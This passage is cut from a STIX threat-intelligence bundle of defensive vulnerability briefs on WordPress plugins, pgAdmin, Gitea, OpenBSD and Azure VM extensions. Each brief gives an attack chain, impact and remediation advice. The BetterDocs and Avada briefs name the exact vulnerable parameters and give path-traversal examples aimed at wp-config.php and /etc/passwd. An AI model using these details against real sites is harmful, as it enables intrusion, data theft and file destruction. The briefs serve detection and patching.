      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2ce48c8e-7344-5fdf-9b84-f27bdbd6584e",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--2ce48c8e-7344-5fdf-9b84-f27bdbd6584e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-7515: BetterDocs Pro WordPress Plugin Local File Inclusion",
      "description": "## Overview\n\nThe BetterDocs Pro plugin for WordPress is affected by a critical Local File Inclusion (LFI) vulnerability, identified as CVE-2026-7515. This flaw impacts all plugin versions up to and including 3.8.0. Attackers can exploit this vulnerability without authentication by manipulating the `doc_style` parameter in HTTP requests. By injecting path traversal sequences and targeting specific PHP files, unauthenticated attackers can force the server to include and execute arbitrary PHP files. Successful exploitation grants remote code execution (RCE) capabilities, enabling bypass of access controls, exfiltration of sensitive data, and full compromise of the affected WordPress instance. This vulnerability poses a significant risk to organizations using the BetterDocs Pro plugin due to its ease of exploitation and severe potential impact.\n\n## Attack Chain\n\n1.  An unauthenticated attacker identifies a public-facing WordPress instance running the vulnerable BetterDocs Pro plugin (version 3.8.0 or earlier).\n2.  The attacker crafts a malicious HTTP GET or POST request targeting a BetterDocs Pro endpoint, manipulating the `doc_style` parameter.\n3.  The `doc_style` parameter is injected with path traversal sequences (e.g., `../../../`) combined with the name of a desired PHP file, such as `wp-config.php` for sensitive data exposure or a previously uploaded malicious webshell.\n4.  The vulnerable BetterDocs Pro plugin processes the malformed `doc_style` parameter without proper sanitization, leading the WordPress server to include the attacker-specified PHP file.\n5.  If a sensitive system file (e.g., `/etc/passwd` or `wp-config.php`) is included, its contents are returned in the HTTP response, exposing critical system or application data.\n6.  If the attacker had previously uploaded a malicious PHP file (e.g., via another vulnerability or legitimate upload mechanism), its arbitrary PHP code is executed on the server, establishing a webshell or backdoor.\n7.  Upon successful code execution, the attacker gains full remote control over the WordPress server, allowing for further actions such as data exfiltration, privilege escalation, or deploying additional malware.\n8.  The attacker maintains persistence, potentially using the compromised server as a pivot point for lateral movement within the network or launching further attacks.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-7515 results in severe consequences for affected organizations. With a CVSS v3.1 Base Score of 9.8 (CRITICAL), this vulnerability allows unauthenticated attackers to achieve remote code execution (RCE) on the compromised WordPress server. This can lead to complete server takeover, including the ability to bypass access controls, exfiltrate sensitive data such as database credentials and user information, deface websites, or host malicious content. Organizations in all sectors running the vulnerable plugin are at risk of significant data breaches, operational disruption, and reputational damage if their systems are compromised.\n\n## Recommendation\n\n*   Immediately patch BetterDocs Pro to a version greater than 3.8.0.\n*   Deploy the `Detect CVE-2026-7515 LFI Exploitation Attempt` Sigma rule to your web server logs to identify and alert on attempted exploitation.\n*   Implement a Web Application Firewall (WAF) rule to specifically block path traversal sequences (`../`, `..\\`) and attempts to include arbitrary PHP files within the `doc_style` parameter.\n*   Enable comprehensive process creation logging on your web servers (e.g., using Sysmon on Windows or Auditd on Linux) to detect suspicious child processes spawned by the web server, as identified by the `Detect Suspicious Processes from Web Server` Sigma rule.\n*   Review web server access logs for requests containing `doc_style` parameters with unusual values or path traversal indicators.\n",
      "published": "2026-06-19T06:28:41Z",
      "labels": [
        "wordpress",
        "plugin",
        "lfi",
        "rce",
        "web-application",
        "php"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7515"
        },
        {
          "source_name": "reference",
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/694b67d2-7d60-4764-a2c0-02698c331772?source=cve"
        },
        {
          "source_name": "reference",
          "url": "https://betterdocs.co/"
        },
        {
          "source_name": "reference",
          "url": "https://betterdocs.co/changelog/"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--14fdd40c-2ce0-5cfb-9aca-3997b1f34526",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bb0ebc4b-7929-5c08-aa44-c9e3869dd527",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Destruction",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1485",
          "url": "https://attack.mitre.org/techniques/T1485"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a66e4f8e-d1e9-5456-ba02-5e36d07e54dd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bb0ebc4b-7929-5c08-aa44-c9e3869dd527",
      "target_ref": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--bb0ebc4b-7929-5c08-aa44-c9e3869dd527",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-8713: Avada (Fusion) Builder WordPress Plugin Arbitrary File Deletion",
      "description": "## Overview\n\nThe Avada (Fusion) Builder plugin for WordPress, impacting all versions up to and including 3.15.3, is vulnerable to arbitrary file deletion due to inadequate file path validation within the `maybe_delete_files` function. This flaw, tracked as CVE-2026-8713 with a CVSS v3.1 Base Score of 9.1, enables unauthenticated attackers to delete arbitrary files on the compromised server. Exploitation requires a published Avada form configured to save entries to the database. Attackers send a specially crafted path-traversal payload to the `wp_ajax_nopriv_fusion_form_submit_ajax` handler, manipulating `fusion_privacy_expiration_interval` and `privacy_expiration_action` fields to force immediate cleanup and processing by the `Fusion_Form_DB_Privacy` shutdown-hook. The deletion of critical files, such as `wp-config.php`, can easily pave the way for remote code execution or site defacement, posing a severe risk to affected WordPress installations.\n\n## Attack Chain\n\n1.  An unauthenticated attacker identifies a WordPress site utilizing the vulnerable Avada (Fusion) Builder plugin (versions \u003c= 3.15.3).\n2.  The attacker confirms the presence of an active Avada form configured to store entries within the site's database.\n3.  The attacker crafts a malicious HTTP POST request containing a path-traversal payload (e.g., `../../wp-config.php`).\n4.  This request targets the `wp-admin/admin-ajax.php` endpoint, specifically invoking the `wp_ajax_nopriv_fusion_form_submit_ajax` action.\n5.  The payload also manipulates the `fusion_privacy_expiration_interval` and `privacy_expiration_action` fields within the form submission to instruct the plugin to perform an immediate 'delete' cleanup action.\n6.  Upon processing the request, the WordPress site's `Fusion_Form_DB_Privacy` shutdown-hook routine is immediately triggered without administrator interaction.\n7.  The `maybe_delete_files` function, lacking proper path validation, attempts to delete the file specified by the path-traversal payload (e.g., `wp-config.php`).\n8.  Successful deletion of critical configuration files allows for site defacement, denial of service, or subsequent remote code execution by uploading a new malicious file with the same name.\n\n## Impact\n\nThe arbitrary file deletion vulnerability in the Avada (Fusion) Builder plugin carries a critical impact. Successful exploitation by unauthenticated attackers can lead to site defacement, denial of service (by deleting essential WordPress files), or, most critically, remote code execution. If files such as `wp-config.php`, `index.php`, or other critical PHP files are deleted, attackers can then upload their own malicious files, gaining full control over the compromised WordPress site. This can result in data exfiltration, implanting malware, or using the site for further attacks, potentially affecting a large number of websites given Avada's popularity.\n\n## Recommendation\n\n*   Immediately update the Avada (Fusion) Builder plugin to a patched version (3.15.4 or later) to remediate CVE-2026-8713.\n*   Deploy the Sigma rule \"Detects CVE-2026-8713 Exploitation — Avada Builder Path Traversal Attempt\" to your SIEM for early warning of exploitation attempts.\n*   Review web server access logs for patterns identified by the Sigma rules, specifically for requests to `/wp-admin/admin-ajax.php` containing path traversal sequences and the mentioned action/parameters.\n*   Ensure robust file integrity monitoring (FIM) is in place, especially for critical WordPress files like `wp-config.php`, to detect unauthorized deletion or modification.\n",
      "published": "2026-06-19T06:29:50Z",
      "labels": [
        "vulnerability",
        "wordpress",
        "plugin",
        "webserver",
        "rce",
        "file-deletion"
      ],
      "object_refs": [
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
        "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8713"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7250cdbc-020e-5be9-9a22-48f4d13b2a0c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--840dedad-3574-5778-aeb0-c878d75720f3",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--840dedad-3574-5778-aeb0-c878d75720f3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenBSD Information Disclosure Vulnerability",
      "description": "## Overview\n\nA recently identified information disclosure vulnerability in OpenBSD allows a remote, unauthenticated attacker to access potentially sensitive system or user data. This flaw could enable an adversary to gather critical intelligence, such as configuration details, user credentials, or other proprietary information, without prior authentication. While specific details regarding the nature of the information exposed or the exploitation method are not publicly available, such vulnerabilities are frequently leveraged during the reconnaissance phase of a targeted attack or to facilitate privilege escalation and lateral movement. Defenders should prioritize patching and robust monitoring for any anomalous access patterns or data exfiltration attempts originating from OpenBSD systems to mitigate the risks associated with this vulnerability.\n\n## Attack Chain\n\n1.  **Reconnaissance \u0026 Vulnerability Identification:** An attacker identifies an internet-facing OpenBSD system and scans for the presence of the information disclosure vulnerability.\n2.  **Exploitation Attempt:** The attacker crafts and sends a specially malformed request or input to the vulnerable OpenBSD service or component.\n3.  **Information Leakage:** The vulnerable OpenBSD system processes the malicious input incorrectly, leading to the disclosure of sensitive data, such as memory contents, configuration files, or user information.\n4.  **Data Collection:** The attacker captures the leaked information, which may include details like system architecture, user accounts, service configurations, or parts of confidential files.\n5.  **Analysis and Planning:** The attacker analyzes the gathered information to identify further attack vectors, such as default credentials, vulnerable services, or misconfigurations.\n6.  **Follow-on Attack Preparation:** Based on the disclosed information, the attacker may prepare for privilege escalation, lateral movement, or data exfiltration, leveraging the newly acquired intelligence.\n\n## Impact\n\nSuccessful exploitation of this OpenBSD information disclosure vulnerability could have significant consequences, even if it doesn't immediately lead to full system compromise. The exposure of sensitive data, such as cryptographic keys, configuration files containing database credentials, or user authentication tokens, could directly lead to unauthorized access, privilege escalation, or further system compromise. While no specific victims or affected sectors have been disclosed, any organization utilizing OpenBSD could be at risk. The loss of confidentiality for critical system components or user data can erode trust, incur regulatory fines, and necessitate extensive forensic investigation and remediation efforts.\n\n## Recommendation\n\n*   Apply the latest security updates and patches for OpenBSD systems as soon as they become available to address this vulnerability.\n*   Implement robust network segmentation to limit exposure of OpenBSD systems to untrusted networks.\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect unusual file access or network activity.\n*   Enable comprehensive process creation and file event logging on OpenBSD systems to activate rules like \"Detect Suspicious File Access to Sensitive System Paths\" and \"Detect Uncommon Outbound Connections from System Binaries\".\n",
      "published": "2026-06-19T08:21:31Z",
      "labels": [
        "openbsd",
        "vulnerability",
        "information-disclosure",
        "linux"
      ],
      "object_refs": [
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2003"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0427775c-40b3-5da5-8e64-b9267c38e7db",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a369ac8c-b45c-5ccd-be19-ed081c238caa",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e221ce6a-d0f0-5722-8321-79da5393c845",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a369ac8c-b45c-5ccd-be19-ed081c238caa",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fd7dff7e-e3ed-5534-8863-1437d6748cc9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a369ac8c-b45c-5ccd-be19-ed081c238caa",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--181bd7a0-768c-5c9c-8b26-2542ccb9a6a8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a369ac8c-b45c-5ccd-be19-ed081c238caa",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--249e09e8-8fdb-5e29-bdc0-dbf4126279f0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a369ac8c-b45c-5ccd-be19-ed081c238caa",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Inhibit System Recovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1490",
          "url": "https://attack.mitre.org/techniques/T1490"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--667fcc59-e91e-5f13-b342-50bbe2ec5ad4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a369ac8c-b45c-5ccd-be19-ed081c238caa",
      "target_ref": "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a369ac8c-b45c-5ccd-be19-ed081c238caa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "pgAdmin: Multiple Vulnerabilities Lead to RCE, SQLi, XSS",
      "description": "## Overview\n\nA remote, authenticated attacker can leverage multiple vulnerabilities within pgAdmin to gain significant control and access to affected systems. This advisory from BSI CERT-Bund, published on 2026-06-19, highlights a high-severity threat where an attacker, having obtained initial access through legitimate authentication, can exploit weaknesses to achieve arbitrary code execution with user or administrator privileges. The vulnerabilities also permit bypassing security mechanisms, performing SQL Injection and Cross-Site Scripting (XSS) attacks, redirecting users to malicious websites, disclosing sensitive information, and manipulating data. This broad range of capabilities poses a critical risk to the integrity, confidentiality, and availability of data and systems managed by pgAdmin instances across Windows, Linux, and macOS platforms.\n\n## Attack Chain\n\n1. Initial Access / Authentication: Attacker gains legitimate authenticated access to the pgAdmin web interface, potentially via compromised credentials or other means not detailed.\n2. Vulnerability Identification: Attacker identifies and targets specific web application vulnerabilities within the pgAdmin interface (e.g., SQL Injection points, XSS input fields, or command injection flaws).\n3. Security Bypass: Exploits vulnerabilities to bypass existing security measures, such as input sanitization or access controls, often leveraging SQLi or path traversal.\n4. Code Execution (SQLi/XSS/RCE): Leverages specific vulnerabilities (e.g., SQL Injection, Cross-Site Scripting, or a direct Remote Code Execution flaw) to inject and execute malicious code or commands.\n5. Privilege Escalation: If initial code execution is at a lower privilege, the attacker exploits further vulnerabilities to escalate privileges to user or administrator level on the underlying system.\n6. Data Manipulation/Disclosure: With elevated privileges or direct access, the attacker manipulates existing data, deletes critical information, or exfiltrates sensitive data from the database.\n7. Impact on Users (XSS/Redirection): Through Cross-Site Scripting (XSS), the attacker may redirect legitimate pgAdmin users to malicious external websites or harvest their credentials.\n8. System Compromise: Ultimately leads to full compromise of the pgAdmin server and potentially connected database systems, allowing for further lateral movement or persistent access.\n\n## Impact\n\nThe successful exploitation of these vulnerabilities can lead to severe consequences, including full system compromise and loss of data integrity and confidentiality. Attackers can execute arbitrary code, potentially leading to the deployment of malware, ransomware, or backdoors. The ability to perform SQL Injection allows direct manipulation or exfiltration of database contents. Cross-Site Scripting can compromise user sessions and redirect legitimate users to phishing sites. Data manipulation can corrupt critical business information, while sensitive information disclosure can expose proprietary data, intellectual property, or personal identifiable information (PII). While no specific victim counts or sectors are mentioned in the advisory, any organization utilizing pgAdmin across Windows, Linux, or macOS could be at high risk.\n\n## Recommendation\n\n* Immediately apply all available security updates for pgAdmin to address the multiple identified vulnerabilities, as detailed in the BSI CERT-Bund advisory WID-SEC-2026-2005.\n* Deploy the provided Sigma rules for webserver logs (Detect SQL Injection in pgAdmin Web Requests, Detect XSS Attempts in pgAdmin Web Requests, Detect Command Injection in pgAdmin Web Requests) to your SIEM solution to detect attempted exploitation of these vulnerabilities.\n* Enable comprehensive webserver access logging for all pgAdmin instances to capture `cs-uri-stem`, `cs-uri-query`, and `cs-method` for forensic analysis and detection.\n* Implement strict access controls and monitor all authenticated access to pgAdmin for anomalous behavior, especially attempts to modify configurations or execute unusual commands.\n",
      "published": "2026-06-19T09:23:26Z",
      "labels": [
        "pgadmin",
        "vulnerability",
        "web-application",
        "rce",
        "sql-injection",
        "xss"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2005"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6929229a-694a-55d9-8112-96cb65f744d2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--99f64751-3a73-5695-a53f-1c1d4abf7e3b",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--99f64751-3a73-5695-a53f-1c1d4abf7e3b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Gitea Security Bypass Vulnerability",
      "description": "## Overview\n\nA high-severity security vulnerability has been identified in Gitea, a widely used self-hosted Git service, which allows a remote, unauthenticated attacker to bypass established security measures. This flaw enables attackers to circumvent protection mechanisms designed to enforce access controls, authentication, or authorization within the application. The specific technical details of how the bypass is achieved are not publicly disclosed in the advisory. This vulnerability is critical for organizations using Gitea for version control, as a successful exploitation could lead to unauthorized access to sensitive code repositories, privilege escalation, or manipulation of the Gitea environment without proper authorization. Immediate action is required for all Gitea deployments to mitigate this risk.\n\n## Attack Chain\n\n1.  **Reconnaissance**: An attacker identifies publicly accessible Gitea instances, for example, through passive scanning or open-source intelligence.\n2.  **Vulnerability Exploitation**: The attacker crafts and sends a malicious HTTP request (e.g., POST or GET request) targeting the specific security flaw in the Gitea web application.\n3.  **Security Bypass**: The vulnerable Gitea instance processes the malformed request, which triggers the undisclosed flaw, allowing the attacker to bypass an intended security control like authentication or authorization.\n4.  **Unauthorized Access**: The attacker successfully circumvents the security measures, gaining unauthorized access to restricted features, data, or an elevated privilege level within the Gitea application.\n5.  **Post-Exploitation Actions**: Leveraging this unauthorized access, the attacker interacts with Gitea to perform actions such as viewing private repositories, modifying user roles, or altering critical system configurations.\n6.  **Impact**: The attacker achieves their objective, which could include data exfiltration, code injection into managed repositories, or establishing persistence within the Gitea environment, compromising the confidentiality and integrity of source code and intellectual property.\n\n## Impact\n\nA successful exploitation of this Gitea vulnerability could lead to significant consequences for affected organizations. Attackers could gain unauthorized access to private code repositories, potentially stealing intellectual property or sensitive business logic. The bypass of security measures could also enable privilege escalation, allowing an unauthenticated attacker to assume administrative roles, leading to full compromise of the Gitea instance. This could result in data manipulation, injection of malicious code into development pipelines, or the deployment of backdoors, undermining the integrity of an organization's software development lifecycle and potentially leading to wider system compromise if Gitea interacts with other critical infrastructure.\n\n## Recommendation\n\n*   Apply the latest security patches and updates released by Gitea immediately to address this security bypass vulnerability.\n*   Monitor Gitea application logs and web server access logs for anomalous HTTP requests, particularly those from unauthenticated sources that may indicate attempted exploitation of unknown bypass vectors.\n*   Implement strong network segmentation and access controls to limit external exposure of Gitea instances and ensure only necessary personnel have access.\n",
      "published": "2026-06-19T09:48:17Z",
      "labels": [
        "gitea",
        "vulnerability",
        "web-application",
        "defense-evasion"
      ],
      "object_refs": [
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-3690"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d22e947-f5b5-5413-afc0-4129fd64c345",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Cloud Administration Command",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1651",
          "url": "https://attack.mitre.org/techniques/T1651"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f8879a78-4555-5d26-b532-408f2c656a62",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e7af7e21-14d1-5523-b8d2-126c6584f6c3",
      "target_ref": "attack-pattern--5d22e947-f5b5-5413-afc0-4129fd64c345"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--94afedf1-5742-5d0f-96e9-bfb003fcb746",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Initialization Scripts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1037",
          "url": "https://attack.mitre.org/techniques/T1037"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--53b8a597-1d5a-5d51-bdba-3d80f51cf58a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e7af7e21-14d1-5523-b8d2-126c6584f6c3",
      "target_ref": "attack-pattern--94afedf1-5742-5d0f-96e9-bfb003fcb746"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--e7af7e21-14d1-5523-b8d2-126c6584f6c3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Azure VM Extension CRUD from Unusual Source ASN",
      "description": "## Overview\n\nThis brief details a threat identified by Elastic, focusing on the abuse of Azure Virtual Machine (VM) and VM Scale Set (VMSS) extensions. Threat actors can perform create, read, update, or delete (CRUD) operations on these extensions, such as `CustomScript` or `Desired State Configuration (DSC)`, from an unusual source Autonomous System (AS) number. These extensions execute with high privileges (SYSTEM on Windows, root on Linux) on the guest operating system, making them a prime target for initial code execution, maintaining persistence, or defense evasion. This technique allows adversaries to run arbitrary commands, install malware, or modify system configurations without direct login, leveraging compromised Azure credentials or identities. The detection specifically targets activity originating from networks not historically associated with managing a given extension resource, while excluding benign first-party Microsoft automation.\n\n## Attack Chain\n\n1.  **Initial Access**: Attacker obtains valid Azure credentials (e.g., user account, service principal) through methods such as phishing, credential stuffing, or exploiting a misconfiguration.\n2.  **Privilege Escalation/Lateral Movement (Azure Plane)**: Attacker identifies a target Azure subscription or resource group with permissions to manage VM or VM scale set extensions.\n3.  **VM Extension CRUD Operation**: Attacker uses the compromised credentials to perform a `WRITE` (create/update), `DELETE`, or `READ` operation against an Azure VM or VMSS extension. This operation originates from an AS number not typically observed for managing that specific resource.\n4.  **Code Execution (Guest OS)**: If a `WRITE` operation is performed using extensions like `CustomScript` or `DSC`, the malicious script or command embedded in the extension definition is executed on the target VM's guest OS with SYSTEM (Windows) or root (Linux) privileges.\n5.  **Persistence/Defense Evasion**: The executed code establishes persistence mechanisms, such as new services, scheduled tasks, or modifying existing configurations, or removes security agents to evade detection.\n6.  **Internal Reconnaissance \u0026 Data Exfiltration**: With high privileges on the VM, the attacker performs internal network reconnaissance, collects sensitive data, and prepares for exfiltration to attacker-controlled infrastructure.\n7.  **Impact \u0026 Follow-on Activity**: The attacker might deploy ransomware, conduct further lateral movement across the internal network, or maintain long-term access for data theft.\n\n## Impact\n\nSuccessful exploitation of Azure VM extensions grants attackers SYSTEM or root-level privileges on target virtual machines, leading to severe consequences. This can result in unauthorized code execution, installation of persistent backdoors, and the ability to disable security controls. Organizations can face significant data breaches, potential ransomware deployment, and complete compromise of critical cloud infrastructure. The impact extends to business disruption, regulatory non-compliance, and substantial financial and reputational damage. While specific victim counts are not available for this general technique, highly privileged access on cloud assets is consistently associated with the most severe incident types.\n\n## Recommendation\n\n- Deploy the provided Sigma rules to your SIEM, focusing on Azure Activity Logs (`category: cloud`, `product: azure`).\n- Enable comprehensive logging for Azure Activity Logs across all subscriptions to capture `MICROSOFT.COMPUTE/VIRTUALMACHINES/EXTENSIONS` events.\n- Implement a baseline of expected `source.as.number` values for all Azure VM/VMSS extension management activities and create an allowlist for known, legitimate ASNs (e.g., CI/CD pipelines, internal management networks).\n- Review 